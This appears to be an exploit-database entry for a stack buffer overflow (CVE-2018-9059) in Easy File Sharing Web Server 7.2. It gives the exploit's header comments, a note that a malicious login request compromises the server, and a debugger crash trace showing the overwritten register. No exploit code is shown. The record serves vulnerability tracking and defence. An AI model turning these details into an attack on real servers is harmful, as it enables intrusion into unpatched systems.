Easy file sharing web server 7.2 stack buffer overflow Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2018-04-18 |
Type : remote |
Platform : windows
[+] Code ...
# Exploit Title: Easy File Sharing Web Server 7.2 stack buffer overflow
# Date: 03/24/2018
# Exploit Author: rebeyond - http://www.rebeyond.net
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# CVE: CVE-2018-9059
# Tested on: Windows XP Professional SP3
#
# Description:
# Attackers just need to construct a malicious login request packet,and send the packet to the server.The server can be pwned
#
#
# The stack trace is as follows:
# (40d8.2980): Access violation - code c0000005 (first chance)
# r
# eax=41414141 ebx=00000001 ecx=ffffffff edx=08fb62a0 esi=08fb6280 edi=08fb62a0
# eip=61c277f6 esp=08fb61fc ebp=08fb6214 iopl=0 nv up ei pl nz na pe nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
# *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\EFS Software\Easy File Sharing Web Server\sqlite3.dll -
# sqlite3!sqlite3_errcode+0x8e:
# 61c277f6 81784c97a629a0 cmp dword ptr [eax+4Ch],0A029A697h ds:002b:4141418d=????????
#
# kb
# ChildEBP RetAddr Args to Child
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 083b6214 61c6286c 00001183 0000115d 085c4d44 sqlite3!sqlite3_errcode+0x8e
# *** WARNING: Unable to verify checksum for fsws.exe
# *** ERROR: Module load completed but symbols could not be loaded for fsws.exe
# 083b6254 004968f4 00000001 00000000 083b6280 sqlite3!sqlite3_declare_vtab+0x3282
# 083b6274 004975a3 083b6298 00000000 083b75fc fsws+0x968f4
# 00000000 00000000 00000000 00000000 00000000 fsws+0x975a3